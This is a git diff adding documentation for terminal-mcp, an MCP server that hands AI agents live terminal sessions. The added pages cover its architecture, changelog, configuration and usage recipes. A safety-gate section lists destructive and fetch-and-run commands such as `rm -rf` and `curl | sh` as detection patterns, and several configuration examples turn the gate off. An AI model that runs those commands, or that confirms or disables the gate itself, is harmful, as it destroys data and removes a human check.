-- **Dangerous command gate** — detects risky commands (`rm -rf`, `DROP TABLE`, `curl|sh`, `chmod 777`, etc.) and returns `requires_confirmation` instead of executing. Resend with `confirmed=true` to proceed. 17 built-in patterns, extensible via `TERMINAL_MCP_DANGEROUS_PATTERNS` env var, disable with `TERMINAL_MCP_SAFETY_GATE=off`
-- **OSC 133 shell integration** — auto-detects command boundary markers emitted by modern shells (bash 5.2+, zsh, fish). When detected, read responses include `command_state`, `exit_code`, and `command_complete` fields for precise command completion tracking
-
-### v0.3.3
-
-- **Buffer memory cap** — per-session PTY buffer capped at 1MB (configurable via `TERMINAL_MCP_MAX_BUFFER_BYTES`), prevents unbounded memory growth on long-running sessions
-- **Async event loop** — all blocking PTY calls wrapped in `asyncio.to_thread()`, unblocking the event loop for concurrent MCP requests
-- **Snapshot ANSI stripping** — `strip_ansi` parameter now correctly applied in snapshot and scrollback read modes
-- **Exec output truncation** — `session_exec` now applies `max_output_bytes` truncation to prevent context overflow
-- **SIGTERM cleanup** — added signal handler to close all PTY sessions on SIGTERM (Docker stop, `kill`, systemd)
-- **Close race condition** — `close()` now handles pexpect exceptions when child process is already reaped
-- Removed unused `import atexit` from server.py
-
-### v0.3.1
-
-- **MCP registry publication** — added `mcp-name` marker and `server.json` for official MCP registry
-- Version bump for registry metadata
-
-### v0.3.0
-
-- **Output truncation** — large outputs are now automatically truncated to `max_output_bytes` (100KB default)
-- **Environment variable config** — all settings configurable via `TERMINAL_MCP_*` env vars
-- **session_resize tool** — dynamically resize terminal dimensions (sends SIGWINCH)
-- **Secret input** — `password` parameter on `session_send` for credentials (redacted from logs)
-- **Scrollback buffer** — `pyte.HistoryScreen` with configurable history depth; `scrollback` param on `session_read`
-- **session_exec tool** — one-shot command execution with automatic session cleanup
-- **PyPI publishing** — `pip install terminal-mcp` via trusted publishing workflow
-
-### v0.2.0
-
-- **Special key support** — arrow keys, Tab, Escape, function keys (F1–F12), Home/End, Page Up/Down, and more via the `key` parameter on `session_send`
-- **Mutual exclusivity** — `input`, `control_char`, and `key` are now validated as mutually exclusive
-- Added GitHub Actions CI (Python 3.10–3.13) and CodeQL security scanning
-- Added project metadata, classifiers, and MIT license
-
-### v0.1.0
-
-- Initial release
-- Persistent PTY sessions via pexpect
-- Stream and snapshot read modes
-- Control character support (Ctrl-C, Ctrl-D, Ctrl-Z, Ctrl-L)
-- Session management with idle cleanup
+---
 
 ## Running Tests
 
@@ -661,13 +330,7 @@ pytest tests/ -v
 
 ## Contributing
 
-Contributions are welcome! Please open an issue first to discuss what you'd like to change.
-
-1. Fork the repository
-2. Create a feature branch
-3. Add tests for new functionality
-4. Ensure all tests pass: `pytest tests/ -v`
-5. Submit a pull request
+Contributions welcome! See [docs/contributing.md](docs/contributing.md) for guidelines.
 
 ## License
 

--- a/docs/architecture.md
+++ b/docs/architecture.md
@@ -1,0 +1,171 @@
+# Architecture
+
+terminal-mcp is an MCP (Model Context Protocol) server that exposes interactive PTY sessions as tools for AI agents.
+
+## Overview
+
+```
+AI Client (Claude, Copilot, Cursor, etc.)
+    |
+    | MCP JSON-RPC over stdio
+    |
+terminal-mcp Server
+    |
+    +-- SessionManager (thread-safe session lifecycle)
+    |       |
+    |       +-- PTYSession 1 (bash)
+    |       |       +-- pexpect.spawn → /bin/bash
+    |       |       +-- Reader Thread (daemon)
+    |       |       +-- pyte Screen Buffer
+    |       |
+    |       +-- PTYSession 2 (python3)
+    |       |       +-- pexpect.spawn → python3
+    |       |       +-- Reader Thread (daemon)
+    |       |       +-- pyte Screen Buffer
+    |       |
+    |       +-- Cleanup Thread (daemon)
+    |
+    +-- Tool Handlers (async, one per MCP tool)
+    +-- Safety Gate (dangerous command detection)
+    +-- Config (env var driven)
+```
+
+## Components
+
+### MCP Server (`server.py`)
+
+The entry point. Uses the `mcp` Python SDK to register 9 tools and serve them over stdio transport (newline-delimited JSON-RPC). Each tool call is dispatched to an async handler function.
+
+The server runs on Python's `asyncio` event loop. All blocking PTY operations are wrapped in `asyncio.to_thread()` to avoid blocking the event loop during concurrent MCP requests.
+
+### PTYSession (`pty_session.py`)
+
+The core component. Each session wraps a real PTY allocated via `pexpect.spawn` (Unix) or `pexpect.PopenSpawn` (Windows).
+
+**Initialization:**
+- Spawns the child process with the requested command
+- Starts a daemon reader thread
+- Initializes a `pyte.HistoryScreen` for snapshot mode
+- Generates a unique 8-character hex session ID
+
+**Buffer management:**
+- An in-memory `bytearray` accumulates all PTY output
+- A `_total_bytes_written` counter tracks the absolute byte position (monotonically increasing, survives buffer trims)
+- When the buffer exceeds `max_buffer_bytes`, older bytes are trimmed from the front
+- A `threading.Lock` protects concurrent access to the buffer
+
+**Reader thread:**
+- Continuously reads from the PTY file descriptor in 4096-byte chunks
+- Appends bytes to the buffer and feeds them to the pyte screen
+- Detects alternate screen buffer sequences (ESC[?1049h) for TUI detection
+- Detects OSC 133 shell integration markers for command boundary tracking
+- Dies automatically when the child process exits
+
+**Read modes:**
+
+| Mode | Implementation |
+|------|---------------|
+| `stream` | Returns bytes written since the last read position. Polls until no new bytes arrive for `timeout` seconds |
+| `snapshot` | Renders the current pyte virtual terminal screen as text |
+| `diff` | Compares the current pyte screen against the previous snapshot, returns only changed lines |
+| `auto` | Uses `snapshot` if a TUI is detected (alternate screen buffer active), otherwise falls back to `stream` |
+
+**Pattern matching (`read_until_pattern`):**
+- Used by `session_interact` (with `wait_for`) and `session_wait_for`
+- Accepts an absolute `start_position` parameter to skip bytes from before the command was sent
+- This prevents false matches against the echoed command text or stale buffer content
+- Polls the buffer at 50ms intervals, testing the regex against new content
+
+**Close sequence:**
+1. Send EOF (Ctrl-D)
+2. Wait up to 2 seconds for clean exit
+3. Send SIGHUP (Unix) or `proc.terminate()` (Windows)
+4. Wait up to 2 seconds
+5. Send SIGKILL (Unix) or `proc.kill()` (Windows)
+
+### SessionManager (`session_manager.py`)
+
+Thread-safe lifecycle management for PTYSession instances.
+
+- Stores sessions in a `dict[str, PTYSession]` protected by a `threading.Lock`
+- The lock is NOT held during `PTYSession` construction (process spawn), only during dict access
+- A background daemon thread runs the cleanup loop every 60 seconds
+- Sessions are auto-closed when idle longer than their timeout or when the process has died
+- `atexit` handler ensures all sessions are cleaned up on interpreter exit
+- SIGTERM handler ensures cleanup on Docker stop, `kill`, or systemd
+
+### Safety Gate (`safety.py`)
+
+Detects dangerous commands before execution.
+
+- 17 built-in regex patterns covering destructive operations:
+  - File system: `rm -rf`, `dd`, `mkfs`
+  - Database: `DROP TABLE`, `TRUNCATE`
+  - Remote execution: `curl | sh`, `wget | sh`
+  - Permissions: `chmod 777`, `chmod -R`, `chown -R`
+  - System: `shutdown`, `reboot`, `kill -9`
+- Extensible via `TERMINAL_MCP_DANGEROUS_PATTERNS` env var (semicolon-separated regexes)
+- Can be disabled with `TERMINAL_MCP_SAFETY_GATE=off`
+- When triggered, returns `requires_confirmation: true` instead of executing
+- Resend with `confirmed: true` to bypass
+
+### Output Processing (`output_buffer.py`)
+
+- **ANSI stripping**: Comprehensive regex-based removal of terminal escape sequences including CSI, OSC, DCS, Kitty keyboard protocol, application keypad mode, and more
+- **Prompt detection**: Heuristic-based detection of shell prompts (looks for common patterns like `$`, `#`, `>>>`, `>`)
+- **Smart truncation**: Four strategies to prevent context overflow while preserving useful output:
+  - `tail` (default): Keep the beginning, truncate the end
+  - `head_tail`: Keep first 30% and last 70% with a line-count marker
+  - `tail_only`: Keep only the end (ideal for build logs)
+  - `none`: No truncation
+
+## Data Flow
+
+### Send + Read (session_interact)
+
+```
+1. Client calls session_interact(session_id, input="ls -la", wait_for="\$")
+2. Handler snapshots buffer position: start_pos = current_buffer_end()
+3. Handler sends input bytes to PTY via pexpect
+4. Handler calls read_until_pattern(pattern="\$", start_position=start_pos)
+5. Reader thread is continuously appending PTY output to buffer
+6. read_until_pattern polls buffer[start_pos:] every 50ms
+7. When pattern matches (or timeout): return captured text
+8. Handler strips ANSI, truncates, and returns MCP response
+```
+
+### TUI Auto-Detection
+
+```
+1. Reader thread receives ESC[?1049h (alternate screen buffer enter)
+2. Sets _tui_active = True
+3. Client calls session_read(mode="auto")
+4. auto mode sees _tui_active, switches to snapshot
+5. Renders pyte screen buffer as text lines
+6. Returns with mode_used="snapshot", tui_active=true
+```
+
+## Threading Model
+
+terminal-mcp uses a multi-threaded design:
+
+| Thread | Purpose | Lifecycle |
+|--------|---------|-----------|
+| Main (asyncio) | MCP server event loop, tool handlers | Entire server lifetime |
+| Reader thread (per session) | Reads PTY output into buffer | Created with session, dies when process exits |
+| Cleanup thread | Closes idle/dead sessions | Daemon, entire server lifetime |
+
+All shared state is protected by locks:
+- `SessionManager._lock` protects the sessions dictionary
+- `PTYSession._buffer_lock` protects the output buffer and pyte screen
+
+## Cross-Platform Support
+
+| Feature | Unix (Linux/macOS) | Windows |
+|---------|-------------------|---------|
+| PTY backend | `pexpect.spawn` | `pexpect.PopenSpawn` |
+| Process alive check | `child.isalive()` | `proc.poll() is None` |
+| Graceful stop | `SIGHUP` signal | `proc.terminate()` |
+| Force kill | `SIGKILL` signal | `proc.kill()` |
+| Terminal resize | `setwinsize()` + SIGWINCH | Not supported (no-op) |
+| Close cleanup | `child.close(force=True)` | No-op (handle cleanup via proc) |

--- a/docs/changelog.md
+++ b/docs/changelog.md
@@ -1,0 +1,96 @@
+# Changelog
+
+All notable changes to terminal-mcp are documented here.
+
+---
+
+## v0.4.10
+
+- **Safety gate for `session_exec`** — one-shot execution now checks commands against the dangerous command patterns before running. Previously only `session_send` and `session_interact` were gated ([#19](https://github.com/mkpvishnu/terminal-mcp/issues/19))
+
+## v0.4.9
+
+- **Buffer-trim correctness in `session_wait_for`** — `session_wait_for` now snapshots the absolute buffer position before matching, preventing false matches against stale buffer content that survived a buffer trim ([#20](https://github.com/mkpvishnu/terminal-mcp/issues/20))
+
+## v0.4.8
+
+- **Windows `close()` SIGKILL fallback** — on Windows, `close()` now uses `proc.terminate()` and `proc.kill()` instead of attempting POSIX signals (`SIGHUP`/`SIGKILL`) which don't exist on Windows ([#21](https://github.com/mkpvishnu/terminal-mcp/issues/21))
+
+## v0.4.7
+
+- **SessionManager lock optimization** — `SessionManager.create()` no longer holds the global lock during process spawn. Other operations (`get`, `close`, `list`) are no longer blocked while a new session is being created ([#22](https://github.com/mkpvishnu/terminal-mcp/issues/22))
+
+## v0.4.6
+
+- **Bump actions/github-script from 7 to 8** ([#14](https://github.com/mkpvishnu/terminal-mcp/pull/14))
+- **Windows support** — added `pexpect.PopenSpawn` fallback for Windows, with platform-aware process management throughout ([#18](https://github.com/mkpvishnu/terminal-mcp/pull/18))
+
+## v0.4.5
+
+- **Remove stale publish.yml workflow** ([#13](https://github.com/mkpvishnu/terminal-mcp/pull/13))
+
+## v0.4.4
+
+- **Fix release push: use RELEASE_TOKEN for branch protection bypass** ([#12](https://github.com/mkpvishnu/terminal-mcp/pull/12))
+
+## v0.4.3
+
+- **Fix `wait_for` matching command echo** — `session_interact` with `wait_for` no longer matches the echoed input text. Pattern matching now starts from a buffer position anchored before the send ([#6](https://github.com/mkpvishnu/terminal-mcp/issues/6))
+- **Fix `wait_for` matching stale buffer content** — uses a monotonic absolute byte counter that survives buffer trims ([#7](https://github.com/mkpvishnu/terminal-mcp/issues/7))
+- **Idempotent `session_close`** — closing an already-closed session returns `success: true, already_closed: true` instead of an error ([#8](https://github.com/mkpvishnu/terminal-mcp/issues/8))
+- **Comprehensive ANSI stripping** — handles Kitty keyboard protocol, application keypad mode, DCS sequences, and more ([#9](https://github.com/mkpvishnu/terminal-mcp/issues/9))
+
+## v0.4.2
+
+- **Fix `is_alive` race on Linux** — prevents `PtyProcessError` when child processes exit before `waitpid` can reap them
+
+## v0.4.1
+
+- **Auto TUI detection** — detects alternate screen buffer and auto-switches to snapshot mode
+- **Output diff mode** — `mode="diff"` returns only changed screen lines
+- **Intelligent truncation** — four strategies: `tail`, `head_tail`, `tail_only`, `none`
+- **Always-on pyte** — snapshot mode always initialized, `enable_snapshot` deprecated
+- **`read_mode` on session_interact** — choose read mode per call
+- **Thread-safe screen reads** — buffer lock acquired before pyte reads
+
+## v0.4.0
+
+- **`session_interact` tool** — send + read in one call, halving round trips
+- **`session_wait_for` tool** — block until regex pattern matches
+- **Dangerous command gate** — 17 built-in patterns, extensible via env var
+- **OSC 133 shell integration** — auto-detects command boundaries and exit codes
+
+## v0.3.3
+
+- **Buffer memory cap** — per-session buffer capped at 1MB (configurable)
+- **Async event loop** — blocking PTY calls wrapped in `asyncio.to_thread()`
+- **SIGTERM cleanup** — signal handler for Docker stop / systemd
+- **Close race condition** — handles pexpect exceptions on already-reaped child
+
+## v0.3.1
+
+- **MCP registry publication** — `mcp-name` marker and `server.json`
+
+## v0.3.0
+
+- **Output truncation** — auto-truncation to `max_output_bytes`
+- **Environment variable config** — `TERMINAL_MCP_*` env vars
+- **`session_resize`** — dynamic terminal resize with SIGWINCH
+- **Secret input** — `password` parameter on `session_send`
+- **Scrollback buffer** — `pyte.HistoryScreen` with configurable depth
+- **`session_exec`** — one-shot command execution
+- **PyPI publishing** — `pip install terminal-mcp`
+
+## v0.2.0
+
+- **Special key support** — arrow keys, Tab, Escape, F1-F12, Home/End, etc.
+- **Mutual exclusivity** — input types validated as mutually exclusive
+- **CI/CD** — GitHub Actions CI (Python 3.10-3.13) and CodeQL scanning
+
+## v0.1.0
+
+- Initial release
+- Persistent PTY sessions via pexpect
+- Stream and snapshot read modes
+- Control character support
+- Session management with idle cleanup

--- a/docs/configuration.md
+++ b/docs/configuration.md
@@ -1,0 +1,148 @@
+# Configuration
+
+terminal-mcp is configured via environment variables prefixed with `TERMINAL_MCP_`. Since the server runs as a subprocess of your MCP client, these variables must be set in the client's configuration, not in your shell profile.
+
+## Settings Reference
+
+| Setting | Env Var | Default | Description |
+|---------|---------|---------|-------------|
+| Max sessions | `TERMINAL_MCP_MAX_SESSIONS` | `10` | Maximum number of concurrent PTY sessions |
+| Idle timeout | `TERMINAL_MCP_IDLE_TIMEOUT` | `1800` | Seconds of inactivity before a session is auto-closed (30 minutes) |
+| Default rows | `TERMINAL_MCP_DEFAULT_ROWS` | `24` | Default terminal height for new sessions |
+| Default cols | `TERMINAL_MCP_DEFAULT_COLS` | `80` | Default terminal width for new sessions |
+| Read settle timeout | `TERMINAL_MCP_READ_SETTLE_TIMEOUT` | `2.0` | Seconds to wait for output to settle in stream mode |
+| Max output bytes | `TERMINAL_MCP_MAX_OUTPUT_BYTES` | `100000` | Maximum bytes returned per read operation (100KB) |
+| Cleanup interval | `TERMINAL_MCP_CLEANUP_INTERVAL` | `60` | Seconds between idle session cleanup sweeps |
+| Buffer cap | `TERMINAL_MCP_MAX_BUFFER_BYTES` | `1000000` | Maximum per-session PTY buffer size in bytes (1MB) |
+| Safety gate | `TERMINAL_MCP_SAFETY_GATE` | `on` | Enable/disable the dangerous command safety gate (`on` or `off`) |
+| Dangerous patterns | `TERMINAL_MCP_DANGEROUS_PATTERNS` | built-in | Additional dangerous command patterns (semicolon-separated regexes) |
+| Truncation mode | `TERMINAL_MCP_TRUNCATION_MODE` | `tail` | Default output truncation strategy |
+
+## Per-Session Overrides
+
+Some settings can be overridden per session via `session_create`:
+
+| Parameter | Setting It Overrides |
+|-----------|---------------------|
+| `rows` | `TERMINAL_MCP_DEFAULT_ROWS` |
+| `cols` | `TERMINAL_MCP_DEFAULT_COLS` |
+| `idle_timeout` | `TERMINAL_MCP_IDLE_TIMEOUT` |
+| `scrollback_lines` | No global env var (defaults to 1000) |
+
+Set `scrollback_lines=0` to disable scrollback history for a session.
+
+## Client Configuration Examples
+
+### Claude Code
+
+Add to `~/.claude.json` (global) or `.mcp.json` (per-project):
+
+```json
+{
+  "mcpServers": {
+    "terminal": {
+      "command": "uvx",
+      "args": ["terminal-mcp"],
+      "env": {
+        "TERMINAL_MCP_MAX_SESSIONS": "20",
+        "TERMINAL_MCP_IDLE_TIMEOUT": "3600",
+        "TERMINAL_MCP_SAFETY_GATE": "off",
+        "TERMINAL_MCP_TRUNCATION_MODE": "head_tail"
+      }
+    }
+  }
+}
+```
+
+### Claude Desktop
+
+Add to `claude_desktop_config.json`:
+
+```json
+{
+  "mcpServers": {
+    "terminal": {
+      "command": "uvx",
+      "args": ["terminal-mcp"],
+      "env": {
+        "TERMINAL_MCP_MAX_SESSIONS": "20",
+        "TERMINAL_MCP_IDLE_TIMEOUT": "3600"
+      }
+    }
+  }
+}
+```
+
+### VS Code / Cursor
+
+Add to `.vscode/mcp.json`:
+
+```json
+{
+  "servers": {
+    "terminal-mcp": {
+      "command": "uvx",
+      "args": ["terminal-mcp"],
+      "env": {
+        "TERMINAL_MCP_MAX_SESSIONS": "20",
+        "TERMINAL_MCP_IDLE_TIMEOUT": "3600"
+      }
+    }
+  }
+}
+```
+
+### Windsurf
+
+Add to `~/.codeium/windsurf/mcp_config.json`:
+
+```json
+{
+  "mcpServers": {
+    "terminal": {
+      "command": "uvx",
+      "args": ["terminal-mcp"],
+      "env": {
+        "TERMINAL_MCP_MAX_SESSIONS": "20"
+      }
+    }
+  }
+}
+```
+
+### Manual / Testing
+
+When running the server manually for testing:
+
+```bash
+TERMINAL_MCP_MAX_SESSIONS=20 TERMINAL_MCP_SAFETY_GATE=off uvx terminal-mcp
+```
+
+## Truncation Modes
+
+Output truncation prevents large command outputs from overflowing the AI's context window. Four strategies are available:
+
+| Mode | Behavior | Best For |
+|------|----------|----------|
+| `tail` (default) | Keeps the beginning of the output, truncates the end | General use |
+| `head_tail` | Keeps first 30% and last 70%, inserts a line-count marker | Logs with useful header and footer |
+| `tail_only` | Keeps only the end of the output | Build logs, compilation output |
+| `none` | No truncation | When you need everything |
+
+Set globally via `TERMINAL_MCP_TRUNCATION_MODE` or per-call via the `truncation` parameter on `session_read`, `session_interact`, `session_exec`, and `session_wait_for`.
+
+## Buffer Management
+
+Each session maintains an in-memory byte buffer that accumulates all PTY output. When this buffer exceeds `max_buffer_bytes`, older bytes are trimmed from the front.
+
+The buffer uses an absolute position counter (`_total_bytes_written`) that is monotonically increasing and survives trims. This ensures that pattern matching and read operations always reference the correct position in the output stream, even after old data has been discarded.
+
+To increase the buffer for sessions with large output:
+
+```json
+{
+  "env": {
+    "TERMINAL_MCP_MAX_BUFFER_BYTES": "5000000"
+  }
+}
+```

--- a/docs/contributing.md
+++ b/docs/contributing.md
@@ -1,0 +1,134 @@
+# Contributing
+
+Contributions to terminal-mcp are welcome! This guide covers how to set up the development environment, run tests, and submit changes.
+
+## Getting Started
+
+### Prerequisites
+
+- Python 3.10 or later
+- Git
+- A Unix-like environment (Linux or macOS) for full PTY support
+
+### Setup
+
+```bash
+git clone https://github.com/mkpvishnu/terminal-mcp.git
+cd terminal-mcp
+pip install -e ".[dev]"
+```
+
+The `[dev]` extra installs test dependencies: `pytest`, `pytest-asyncio`, and `pytest-cov`.
+
+## Running Tests
+
+```bash
+# Run all tests
+pytest tests/ -v
+
+# Run a specific test file
+pytest tests/test_pty_session.py -v
+
+# Run with coverage
+pytest tests/ --cov=terminal_mcp --cov-report=term-missing
+```
+
+The test suite includes:
+- **Unit tests** for PTYSession, SessionManager, output processing, safety gate, and config
+- **Tool handler tests** for all 9 MCP tools (mocked PTY interactions)
+- **Integration tests** that spawn real PTY processes (skipped on Windows)
+- **Regression tests** for previously fixed bugs
+
+## Project Structure
+
+```
+terminal-mcp/
+  terminal_mcp/
+    __init__.py           # Package metadata
+    server.py             # MCP server entry point and tool registration
+    pty_session.py        # PTYSession class (core PTY management)
+    session_manager.py    # SessionManager (lifecycle, cleanup)
+    output_buffer.py      # ANSI stripping, prompt detection, truncation
+    safety.py             # Dangerous command detection
+    config.py             # Configuration (env var parsing)
+    tools/
+      __init__.py
+      session.py          # Tool handler functions
+  tests/
+    conftest.py           # Shared fixtures
+    test_pty_session.py   # PTYSession unit tests
+    test_session_manager.py # SessionManager tests
+    test_tools.py         # Tool handler tests
+    test_phase1.py        # Phase 1 feature tests
+    test_phase2.py        # Phase 2 feature tests
+    test_bugfixes.py      # Regression tests
+    test_output_buffer.py # Output processing tests
+    test_config.py        # Configuration tests
+  docs/                   # Documentation
+  assets/                 # Banner, demo GIF
+  pyproject.toml          # Build config and dependencies
+  server.json             # MCP registry metadata
+```
+
+## Making Changes
+
+1. **Fork the repository** on GitHub
+2. **Create a feature branch** from `main`:
+   ```bash
+   git checkout -b feature/my-feature main
+   ```
+3. **Write your code** following the existing patterns
+4. **Add tests** for new functionality
+5. **Run the full test suite** and make sure it passes:
+   ```bash
+   pytest tests/ -v
+   ```
+6. **Commit** with a clear, descriptive message:
+   ```bash
+   git commit -m "feat: add support for XYZ"
+   ```
+7. **Push** and open a pull request
+
+## Code Style
+
+- Follow existing patterns in the codebase
+- Use type hints for function signatures
+- Keep functions focused - one function, one responsibility
+- Write async handlers for MCP tools (use `asyncio.to_thread()` for blocking calls)
+- Protect shared state with locks
+
+## Commit Message Convention
+
+Use conventional commit prefixes:
+
+| Prefix | When to Use |
+|--------|-------------|
+| `feat:` | New features |
+| `fix:` | Bug fixes |
+| `perf:` | Performance improvements |
+| `docs:` | Documentation changes |
+| `test:` | Test additions/changes |
+| `refactor:` | Code changes that don't fix bugs or add features |
+| `chore:` | Maintenance (CI, deps, config) |
+
+## Pull Request Labels
+
+PRs must have one of these labels for the release workflow:
+
+| Label | Version Bump |
+|-------|-------------|
+| `patch`, `bug`, `dependencies` | Patch (0.0.x) |
+| `minor`, `feature` | Minor (0.x.0) |
+| `major` | Major (x.0.0) |
+
+## Reporting Issues
+
+Open an issue on GitHub with:
+- A clear description of the problem or feature request
+- Steps to reproduce (for bugs)
+- Your environment (OS, Python version, MCP client)
+- Relevant error messages or logs
+
+## License
+
+By contributing, you agree that your contributions will be licensed under the [MIT License](../LICENSE).

--- a/docs/examples.md
+++ b/docs/examples.md
@@ -1,0 +1,308 @@
+# Use Cases & Examples
+
+Real-world recipes for common terminal-mcp workflows.
+
+---
+
+## SSH Sessions
+
+### Connect to a Remote Server
+
+```
+session_create   command="ssh user@prod-server.com"   label="prod"
+session_read     session_id="a1b2c3d4"  timeout=5
+# Wait for password prompt or key auth to complete
+
+session_interact session_id="a1b2c3d4"  input="hostname"  wait_for="\$"
+session_interact session_id="a1b2c3d4"  input="df -h"  wait_for="\$"
+session_interact session_id="a1b2c3d4"  input="free -m"  wait_for="\$"
+session_close    session_id="a1b2c3d4"
+```
+
+### SSH with Password Authentication
+
+```
+session_create  command="ssh user@server.com"  label="remote"
+session_read    session_id="a1b2c3d4"  timeout=10
+# Wait for "password:" prompt
+
+session_send    session_id="a1b2c3d4"  password="my-secret-password"
+# password parameter ensures credentials are not logged
+
+session_read    session_id="a1b2c3d4"  timeout=5
+```
+
+### SSH Jump Host / Bastion
+
+```
+session_create  command="ssh -J bastion@jump.example.com user@internal.example.com"  label="internal"
+session_read    session_id="a1b2c3d4"  timeout=15
+# Longer timeout for multi-hop connection
+```
+
+---
+
+## Interactive REPLs
+
+### Python
+
+```
+session_create   command="python3"  label="python"
+session_interact session_id="e5f6g7h8"  input="import json"  wait_for=">>>"
+session_interact session_id="e5f6g7h8"  input="data = {'name': 'test', 'value': 42}"  wait_for=">>>"
+session_interact session_id="e5f6g7h8"  input="print(json.dumps(data, indent=2))"  wait_for=">>>"
+session_close    session_id="e5f6g7h8"
+```
+
+### Node.js
+
+```
+session_create   command="node"  label="node"
+session_interact session_id="e5f6g7h8"  input="const fs = require('fs')"  wait_for=">"
+session_interact session_id="e5f6g7h8"  input="fs.readdirSync('.').length"  wait_for=">"
+session_close    session_id="e5f6g7h8"
+```
+
+### IPython / Jupyter Console
+
+```
+session_create   command="ipython"  label="ipython"
+session_interact session_id="e5f6g7h8"  input="%timeit sum(range(1000000))"  wait_for="In \["
+session_interact session_id="e5f6g7h8"  input="import numpy as np; np.random.rand(3,3)"  wait_for="In \["
+session_close    session_id="e5f6g7h8"
+```
+
+---
+
+## Database CLIs
+
+### PostgreSQL
+
+```
+session_create   command="psql -U admin -d mydb"  label="postgres"
+session_interact session_id="x1y2z3w4"  input="SELECT count(*) FROM users;"  wait_for="row"
+session_interact session_id="x1y2z3w4"  input="\\dt"  wait_for="#"
+session_interact session_id="x1y2z3w4"  input="\\d users"  wait_for="#"
+session_close    session_id="x1y2z3w4"
+```
+
+### MySQL
+
+```
+session_create   command="mysql -u root -p mydb"  label="mysql"
+session_read     session_id="x1y2z3w4"  timeout=5
+# Enter password when prompted
+session_send     session_id="x1y2z3w4"  password="db-password"
+session_interact session_id="x1y2z3w4"  input="SHOW TABLES;"  wait_for="mysql>"
+session_close    session_id="x1y2z3w4"
+```
+
+### Redis
+
+```
+session_create   command="redis-cli"  label="redis"
+session_interact session_id="x1y2z3w4"  input="KEYS *"  wait_for=">"
+session_interact session_id="x1y2z3w4"  input="INFO memory"  wait_for=">"
+session_close    session_id="x1y2z3w4"
+```
+
+### MongoDB
+
+```
+session_create   command="mongosh"  label="mongo"
+session_interact session_id="x1y2z3w4"  input="show dbs"  wait_for=">"
+session_interact session_id="x1y2z3w4"  input="use mydb"  wait_for=">"
+session_interact session_id="x1y2z3w4"  input="db.users.countDocuments()"  wait_for=">"
+session_close    session_id="x1y2z3w4"
+```
+
+---
+
+## TUI Applications
+
+### htop (System Monitor)
+
+```
+session_create  command="htop"  label="monitor"
+session_read    session_id="a1b2c3d4"
+# Auto-detects TUI, returns screen snapshot
+
+# Sort by memory
+session_send    session_id="a1b2c3d4"  key="F6"
+session_read    session_id="a1b2c3d4"  mode="diff"
+session_send    session_id="a1b2c3d4"  key="down"
+session_send    session_id="a1b2c3d4"  key="enter"
+session_read    session_id="a1b2c3d4"  mode="diff"
+
+# Quit
+session_send    session_id="a1b2c3d4"  key="F10"
+session_close   session_id="a1b2c3d4"
+```
+
+### vim / neovim
+
+```
+session_create  command="vim myfile.txt"  label="editor"  rows=40  cols=120
+session_read    session_id="a1b2c3d4"
+# Returns screen snapshot
+
+# Enter insert mode, type text
+session_send    session_id="a1b2c3d4"  key="i"
+session_send    session_id="a1b2c3d4"  input="Hello, World!"  press_enter=false
+session_send    session_id="a1b2c3d4"  key="escape"
+
+# Save and quit
+session_send    session_id="a1b2c3d4"  input=":wq"
+session_close   session_id="a1b2c3d4"
+```
+
+### fzf (Fuzzy Finder)
+
+```
+session_create  command="find . -type f | fzf"  label="fzf"
+session_read    session_id="a1b2c3d4"
+
+# Type search query
+session_send    session_id="a1b2c3d4"  input="main.py"  press_enter=false
+session_read    session_id="a1b2c3d4"  mode="diff"
+
+# Navigate and select
+session_send    session_id="a1b2c3d4"  key="down"
+session_send    session_id="a1b2c3d4"  key="enter"
+session_read    session_id="a1b2c3d4"
+```
+
+---
+
+## Build & Development Workflows
+
+### Watch a Build
+
+```
+session_create   command="bash"  label="build"
+session_send     session_id="a1b2c3d4"  input="npm run build"
+session_wait_for session_id="a1b2c3d4"  pattern="Build complete|ERROR|FAIL"  timeout=120
+```
+
+### Run Tests and Wait for Results
+
+```
+session_create   command="bash"  label="tests"
+session_send     session_id="a1b2c3d4"  input="pytest tests/ -v"
+session_wait_for session_id="a1b2c3d4"  pattern="passed|failed|error"  timeout=300
+```
+
+### Start a Dev Server
+
+```
+session_create   command="bash"  label="devserver"
+session_send     session_id="a1b2c3d4"  input="npm run dev"
+session_wait_for session_id="a1b2c3d4"  pattern="ready|localhost|started"  timeout=30
+# Server is now running in the background
+# Use session_read later to check for errors
+```
+
+### Docker Compose
+
+```
+session_exec  exec="docker compose up -d"  timeout=30
+session_exec  exec="docker compose ps"
+session_exec  exec="docker compose logs --tail=20 web"
+```
+
+---
+
+## Multi-Session Workflows
+
+### Parallel Operations
+
+```
+# Start a build in one session
+session_create  command="bash"  label="build"
+session_send    session_id="build-id"  input="npm run build"
+
+# Monitor logs in another
+session_create  command="bash"  label="logs"
+session_send    session_id="logs-id"  input="tail -f /var/log/app.log"
+
+# Check build status
+session_wait_for  session_id="build-id"  pattern="complete|error"  timeout=120
+
+# Read recent logs
+session_read  session_id="logs-id"
+```
+
+### Managing Multiple Sessions
+
+```
+session_list
+# Returns all active sessions with idle times
+
+# Close idle sessions
+session_close  session_id="old-session-1"
+session_close  session_id="old-session-2"
+```
+
+---
+
+## Tips & Patterns
+
+### Use `wait_for` Instead of Timeouts
+
+Instead of:
+```
+session_send  session_id="x"  input="make build"
+session_read  session_id="x"  timeout=30
+# May return incomplete output if build takes longer
+```
+
+Use:
+```
+session_send     session_id="x"  input="make build"
+session_wait_for session_id="x"  pattern="Build succeeded|Error:"  timeout=120
+# Returns as soon as the pattern matches
+```
+
+### Use `session_interact` to Halve Round Trips
+
+Instead of:
+```
+session_send  session_id="x"  input="ls -la"
+session_read  session_id="x"
+```
+
+Use:
+```
+session_interact  session_id="x"  input="ls -la"  wait_for="\$"
+# One call instead of two
+```
+
+### Use `diff` Mode for TUI Monitoring
+
+```
+session_read  session_id="htop-session"  mode="diff"
+# Returns only lines that changed - much fewer tokens
+```
+
+### Use `session_exec` for One-Off Commands
+
+```
+session_exec  exec="git status"
+session_exec  exec="python3 -c 'import sys; print(sys.version)'"
+# No session management needed
+```
+
+### Send Ctrl-C to Stop a Running Process
+
+```
+session_send  session_id="x"  control_char="c"
+session_read  session_id="x"
+```
+
+### Resize for Wide Output
+
+```
+session_resize  session_id="x"  rows=50  cols=200
+session_read    session_id="x"  mode="snapshot"
+# Now captures wide tables without wrapping
+```

--- a/docs/safety.md
+++ b/docs/safety.md
@@ -1,0 +1,98 @@
+# Safety & Security
+
+terminal-mcp includes a built-in safety gate that detects potentially dangerous commands before they execute. This is a defense-in-depth measure - AI agents can make mistakes, and a destructive command sent through a persistent terminal session cannot be undone.
+
+## How It Works
+
